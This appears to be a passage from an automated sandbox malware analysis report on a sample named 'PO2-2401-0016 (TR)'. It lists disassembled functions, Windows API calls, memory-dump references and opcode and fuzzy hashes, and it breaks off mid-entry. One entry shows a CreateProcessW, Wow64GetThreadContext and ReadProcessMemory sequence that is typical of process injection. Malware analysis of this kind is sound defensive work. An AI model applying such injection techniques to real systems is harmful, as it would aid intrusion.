                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CloseErrorHandleLast__dosmaperr
                                • String ID:
                                • API String ID: 2583163307-0
                                • Opcode ID: fe54fc5881fbe1bb2b9ba0caba8ad4ec6a26aa326cad3875413a445b5667cc96
                                • Instruction ID: e18fbbcb7a22c04552bfd8c4311a74cff24dfe44b4008bbd8a2a9dba4590c955
                                • Opcode Fuzzy Hash: fe54fc5881fbe1bb2b9ba0caba8ad4ec6a26aa326cad3875413a445b5667cc96
                                • Instruction Fuzzy Hash: AA018932A0466026C3347374A889B7E275A9B92774F79011DFC188B1D3EFA0DE828F90
                                Function 00161310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                Download Yara Rule
                                APIs
                                • __Init_thread_footer.LIBCMT ref: 001617F6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Init_thread_footer
                                • String ID: CALL
                                • API String ID: 1385522511-4196123274
                                • Opcode ID: 6d7db79f3b6404c930a18db847a24aa5cb37f8c2eacfc8d9ad8706a447607976
                                • Instruction ID: e62a7f3171b7e9c9f78c7abf41bc3218ac573b2289cfa89c4ddb93691e861322
                                • Opcode Fuzzy Hash: 6d7db79f3b6404c930a18db847a24aa5cb37f8c2eacfc8d9ad8706a447607976
                                • Instruction Fuzzy Hash: 93229C74608341EFC714DF14C884A2ABBF1BF9A314F19895DF49A8B361D771E865CB82
                                Function 00153837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                                Download Yara Rule
                                APIs
                                • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00153908
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: IconNotifyShell_
                                • String ID:
                                • API String ID: 1144537725-0
                                • Opcode ID: bf5512c0029c98896f892e4a8930ac1ae1fbeda0acfdf5a615a9c0a76a8bbe44
                                • Instruction ID: a4d6993749833659bc8b2e26ca2dc6817443b920e4babc63e1648584db71ec1c
                                • Opcode Fuzzy Hash: bf5512c0029c98896f892e4a8930ac1ae1fbeda0acfdf5a615a9c0a76a8bbe44
                                • Instruction Fuzzy Hash: 4C31C370504300DFD721DF64D884B97BBE4FB59349F00096EF9B98B240E771AA58CB52
                                Function 00155745 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0015949C,?,00008000), ref: 00155773
                                • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,0015949C,?,00008000), ref: 00194052
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CreateFile
                                • String ID:
                                • API String ID: 823142352-0
                                • Opcode ID: fe784b0afee8b0c68e2a3dd27b28c1b96d28e477fb176ad2ac95b17a822f601e
                                • Instruction ID: 18399e9a5f507f7fe2313f86503f05fec8529435b9f21520834aed59db488917
                                • Opcode Fuzzy Hash: fe784b0afee8b0c68e2a3dd27b28c1b96d28e477fb176ad2ac95b17a822f601e
                                • Instruction Fuzzy Hash: 69018030145225F6E7305A6ACC0EF977F99EF067B1F148200BEAC5E1E1C7B45855CB90
                                Function 036DE6FD Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                Download Yara Rule
                                APIs
                                • CreateProcessW.KERNELBASE(?,00000000), ref: 036DEEBB
                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 036DEF51
                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 036DEF73
                                Memory Dump Source
                                • Source File: 00000000.00000002.2063045889.00000000036DD000.00000040.00000020.00020000.00000000.sdmp, Offset: 036DD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_36dd000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                • String ID:
                                • API String ID: 2438371351-0
                                • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                • Instruction ID: 4bad635466dc93d63ab96729e3144bf90618e7cdcbd74ec62da603206e4202d5
                                • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                • Instruction Fuzzy Hash: CD12CD24E24658C6EB24DF64D8507DEB232EF68300F1090E9D10DEB7A5E77A4E85CF5A
                                Function 0016FC70 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                • Instruction ID: 2fde72b48f03e580a4ba6bbb1022041e7a8e18f57e1c66ff8e0f4b6389d84fd6
                                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                • Instruction Fuzzy Hash: 7431E675A00109DBC718CF59E880969F7A6FF49310B2586A9E809CF655D731EDE2DBC0
                                Function 00154ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00154E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00154EDD,?,00221418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00154E9C
                                  • Part of subcall function 00154E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00154EAE
                                  • Part of subcall function 00154E90: FreeLibrary.KERNEL32(00000000,?,?,00154EDD,?,00221418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00154EC0
                                • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00221418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00154EFD
                                  • Part of subcall function 00154E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00193CDE,?,00221418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00154E62
                                  • Part of subcall function 00154E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00154E74
                                  • Part of subcall function 00154E59: FreeLibrary.KERNEL32(00000000,?,?,00193CDE,?,00221418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00154E87
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Library$Load$AddressFreeProc
                                • String ID:
                                • API String ID: 2632591731-0
                                • Opcode ID: f32eeda59d358b207b6d847c99ae75751666db2f49ae4877ae19baa38fbebb68
                                • Instruction ID: 501098067aefdcdbef2e4c27f7a51e3fbaababab33a5ad6c587006d69eddd621
                                • Opcode Fuzzy Hash: f32eeda59d358b207b6d847c99ae75751666db2f49ae4877ae19baa38fbebb68
                                • Instruction Fuzzy Hash: DE112731600205EBCF14AB68DC03FAD77A59F60716F10842EF962AE1C1EF749A899B90
                                Function 00188402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: __wsopen_s
                                • String ID:
                                • API String ID: 3347428461-0
                                • Opcode ID: 80122547a7aed2b4037712062a4c4b51d6ddb010f8cf338af3cda2cc05d62ff4
                                • Instruction ID: 237f13ae5aae9d315b32253252335dde486ff305c5ad59a887ca06a2d954d51f
                                • Opcode Fuzzy Hash: 80122547a7aed2b4037712062a4c4b51d6ddb010f8cf338af3cda2cc05d62ff4
                                • Instruction Fuzzy Hash: 4C11187690410AAFCF15DF58E945A9A7BF5EF48314F114059FC08AB312DB31EA11CBA5
                                Function 00185000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00184C7D: RtlAllocateHeap.NTDLL(00000008,00151129,00000000,?,00182E29,00000001,00000364,?,?,?,0017F2DE,00183863,00221444,?,0016FDF5,?), ref: 00184CBE
                                • _free.LIBCMT ref: 0018506C
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: AllocateHeap_free
                                • String ID:
                                • API String ID: 614378929-0
                                • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                • Instruction ID: 266b106783a09d40fc3a11361281d71a201ecbff4244b16dab8b766888f416d1
                                • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                • Instruction Fuzzy Hash: 1A0126726047056BE3219E699881A9AFBEDFB89370F25051DF19483280EB30AA05CBB4
                                Function 0017E602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                • Instruction ID: 9192162ffa43677d8bf2b1cab57c54a852e11a505a80a1161616c7fa7224d287
                                • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                • Instruction Fuzzy Hash: F1F0F432510A14A6C7323A699C05B5A33F89F76334F218759F829931D2DB74D9028EA5
                                Function 00184C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • RtlAllocateHeap.NTDLL(00000008,00151129,00000000,?,00182E29,00000001,00000364,?,?,?,0017F2DE,00183863,00221444,?,0016FDF5,?), ref: 00184CBE
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: 4186f91697133df72af486308c6d68f2f8b73cec8d19e3f3014b224e4eae5759
                                • Instruction ID: 8db534bfd4602312ff9ad2ea16adc138193b03fff17381b268addba93e7c215b
                                • Opcode Fuzzy Hash: 4186f91697133df72af486308c6d68f2f8b73cec8d19e3f3014b224e4eae5759
                                • Instruction Fuzzy Hash: C3F0E231602226A7DB217F629C09F6B779CBF517B0B158125F819AA281CF30DA019FE0
                                Function 00183820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,?,00221444,?,0016FDF5,?,?,0015A976,00000010,00221440,001513FC,?,001513C6,?,00151129), ref: 00183852
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: 9ef2e33a7c6039a8854e25277eeb00b2972a405547d0d93aa9bd63c05781e6dd
                                • Instruction ID: ca1e5ffeb78cbc3c9f5ffbcdd1f886644a5b74298dc14cf5c30ea4e0e75842e8
                                • Opcode Fuzzy Hash: 9ef2e33a7c6039a8854e25277eeb00b2972a405547d0d93aa9bd63c05781e6dd
                                • Instruction Fuzzy Hash: 24E06531601224A7D63137A69C05B9B3659AB53FB0F1D4225BC39A65D1DB21DF028BE1
                                Function 00154F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                Download Yara Rule
                                APIs
                                • FreeLibrary.KERNEL32(?,?,00221418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00154F6D
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: FreeLibrary
                                • String ID:
                                • API String ID: 3664257935-0
                                • Opcode ID: f06c731ea1d0295a420e8a1efd795d577c73adf9c90e477d90118cc40548df0d
                                • Instruction ID: c274e3cab27d9c4fe7ca6e658373c3cfeed37e84bc4eb7e34f6a84454f370eab
                                • Opcode Fuzzy Hash: f06c731ea1d0295a420e8a1efd795d577c73adf9c90e477d90118cc40548df0d
                                • Instruction Fuzzy Hash: 9FF03071105751CFDB389F6CD490856B7F4AF1431E324897FE5EA8A511C7319888DF50
                                Function 001BCCFF Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON
                                Download Yara Rule
                                APIs
                                • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,0019EE51,00213630,00000002), ref: 001BCD26
                                  • Part of subcall function 001BCC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,001BCD19,?,?,?), ref: 001BCC59
                                  • Part of subcall function 001BCC37: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,001BCD19,?,?,?,?,0019EE51,00213630,00000002), ref: 001BCC6E
                                  • Part of subcall function 001BCC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,001BCD19,?,?,?,?,0019EE51,00213630,00000002), ref: 001BCC7A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: File$Pointer$Write
                                • String ID:
                                • API String ID: 3847668363-0
                                • Opcode ID: 3b46cf46b4c3d18e08ba69abad7954e8b323555b6a35ac55f584dcf7dce32c50
                                • Instruction ID: feb73a49d3786d98551e36be0d093f963c02924b456361ae21ea13679f0f6c76
                                • Opcode Fuzzy Hash: 3b46cf46b4c3d18e08ba69abad7954e8b323555b6a35ac55f584dcf7dce32c50
                                • Instruction Fuzzy Hash: 89E0397A400604EFC7219F8ADD408AABBF8FFD4260710852FE99682510D3B1AA54DBA0
                                Function 00152DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                Download Yara Rule
                                APIs
                                • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00152DC4
                                  • Part of subcall function 00156B57: _wcslen.LIBCMT ref: 00156B6A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: LongNamePath_wcslen
                                • String ID:
                                • API String ID: 541455249-0
                                • Opcode ID: 63b820c59a015440930083b23cc156460eca80ee5d47d6f3796c1450b1e73343
                                • Instruction ID: 0f8d8b00ee095c2fad70037e07bc94a94d6d71952ed2b50350fbd9ea1d371ab0
                                • Opcode Fuzzy Hash: 63b820c59a015440930083b23cc156460eca80ee5d47d6f3796c1450b1e73343
                                • Instruction Fuzzy Hash: 1FE0CD726001245BCB1092989C06FEA77DDDFC8790F040071FD09D7248DA70ADC48590
                                Function 00152B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00153837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00153908
                                  • Part of subcall function 0015D730: GetInputState.USER32 ref: 0015D807
                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00152B6B
                                  • Part of subcall function 001530F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0015314E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                • String ID:
                                • API String ID: 3667716007-0
                                • Opcode ID: 78848761976f914fefd9f763706b0755548bcbdbb0700aebe9c0951066838599
                                • Instruction ID: 6a5e2ced6c320aa542ad8b84e63477d3500cb0dcd2ff9d8b2cef9be1383cd4d6
                                • Opcode Fuzzy Hash: 78848761976f914fefd9f763706b0755548bcbdbb0700aebe9c0951066838599
                                • Instruction Fuzzy Hash: 64E0262230024492C608BBB0B8528ADB7599BF1393F40153EF8768F1A3CF20459EC352
                                Function 0019039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • CreateFileW.KERNELBASE(00000000,00000000,?,00190704,?,?,00000000,?,00190704,00000000,0000000C), ref: 001903B7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CreateFile
                                • String ID:
                                • API String ID: 823142352-0
                                • Opcode ID: 92ad80be1a8b5e84785cd9e18822406134445285d4fa554f582d6f6398a23406
                                • Instruction ID: 263ca8a7be3c85cdedb0e1741aa2d76239c49ba3c2e2e45523dbede234988dcb
                                • Opcode Fuzzy Hash: 92ad80be1a8b5e84785cd9e18822406134445285d4fa554f582d6f6398a23406
                                • Instruction Fuzzy Hash: A8D06C3204014DFBDF029F84DD46EDA3FAAFB48714F014000BE1856020C732E862AB91
                                Function 00151CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                Download Yara Rule
                                APIs
                                • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00151CBC
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: InfoParametersSystem
                                • String ID:
                                • API String ID: 3098949447-0
                                • Opcode ID: b3970d8e762584551636f77641a773482374235680d34a3536d592eef430d3c5
                                • Instruction ID: 5095d367b59a5931935b5d184ef67e570825c68cac49f9b677528450d7295d32
                                • Opcode Fuzzy Hash: b3970d8e762584551636f77641a773482374235680d34a3536d592eef430d3c5
                                • Instruction Fuzzy Hash: 0AC09B35380345FFF23487C0BC4EF147755A75CB00F449001F609695E3C3A21471D690
                                Function 001C744A Relevance: 1.5, APIs: 1, Instructions: 220COMMON
                                Download Yara Rule
                                APIs
